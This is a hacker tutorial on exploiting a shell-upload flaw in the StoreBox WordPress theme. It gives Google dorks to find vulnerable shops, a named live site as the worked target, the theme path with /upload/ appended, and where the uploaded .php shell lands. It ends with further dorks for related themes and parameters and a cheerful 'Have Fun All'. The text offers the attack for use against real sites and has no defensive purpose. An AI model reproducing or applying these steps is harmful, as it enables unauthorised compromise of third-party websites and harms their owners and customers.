Wordpress Storebox Shell Upload Vulnerability
[x] Step 1 -> Go to google.com & search with these dorks .
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
You can create your own dorks more like these .
[x] Step 2 -> After you search , pick up one result .
Go to the page , right click -> view page source (or) Ctrl+U . Look for the theme path within source code .
[x] Step 3 -> Now we found the theme path is
http://www.mybackpackbuddies.com/wp-content/themes/framework/Note that the theme is Framework .
Just add /upload/ at the end of url after framework .
It will be like this .
http://www.mybackpackbuddies.com/wp-content/themes/framework/upload/
[x] Step 4 -> You will found an upload option there if this site is vulnerable to attack .
Here it is .
See an explanation in the picture . Supports extension .php / .txt / .html .
[x] Step 5 -> Now find your shell path . Your file path will be here .
/wp-content/uploads/products_img/your file name
http://www.mybackpackbuddies.com/wp-content/uploads/products_img/pwned.txt
[x] Extra Tips -> If you want more dorks , here it is .
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Have Fun All...
Thanks to : m0bil3_XT(HF) and MHU H4x0r
